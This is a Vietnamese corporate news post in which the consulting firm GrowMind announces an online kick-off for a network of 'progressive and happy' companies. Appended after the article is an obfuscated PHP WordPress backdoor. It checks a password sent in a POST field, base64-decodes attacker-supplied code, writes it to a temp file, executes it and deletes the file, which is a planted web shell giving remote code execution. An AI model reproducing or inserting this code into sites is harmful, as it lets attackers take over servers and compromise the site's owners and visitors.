GROWMIND BẮT TAY HIỆN THỰC HÓA Ý TƯỞNG XÂY DỰNG “MẠNG LƯỚI CÁC CÔNG TY TIẾN BỘ VÀ HẠNH PHÚC”

🛑 Qua hơn một năm đồng hành cùng các doanh nghiệp trên hành trình chuyển đổi, GrowMind đã nhận thấy “Hạnh phúc”, “Tiến bộ”, “Văn minh” đã xuất hiện và trở thành những keyword quan trọng trong sứ mệnh của các công ty. 🛑 Đồng thời, GrowMind cũng thấy rằng để cùng hướng tới và đạt được những giá trị kể trên, các công ty đang thiếu một không gian, một cộng đồng để giao lưu, chia sẻ và hỗ trợ lẫn nhau về quản trị cũng như chuyển đổi. 🤝 “Muốn đi nhanh thì đi một mình, muốn đi xa thì đi cùng nhau”, với mong muốn các doanh nghiệp cùng nhau tiến xa trên hành trình thay đổi và phát triển, GrowMind đã thực hiện hoạt động Kick-off xây dựng “Mạng lưới các công ty tiến bộ và hạnh phúc”. Đây cũng là sứ mệnh mà những nhà sáng lập GrowMind theo đuổi từ những ngày đầu. 🤝 Buổi Kick-off được tổ chức online với sự tham dự, thảo luận sôi nổi từ hơn 20 anh/chị đại diện cho các công ty cùng chí hướng. Sau buổi họp mặt này, các thành viên đã thống nhất cách thức tổ chức, vận hành cho “mạng lưới”; đồng thời hội ý về phạm vi các nội dung được nghiên cứu, chia sẻ. 🤝 Sắp tới đây, GrowMind mong muốn sẽ tiếp tục mở rộng “mạng lưới”, kết nối được tới nhiều nhà lãnh đạo, quản lý, không phân biệt quy mô, vai trò… để không chỉ kiến thức, mà “hạnh phúc”, “tiến bộ” sẽ thực sự được lan tỏa tới nhiều doanh nghiệp hơn nữa. ————————————————- GrowMind – Đồng kiến tạo mạng lưới các công ty tiến bộ và hạnh phúc! https://growmind.vn #growmind #leadership #network
1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}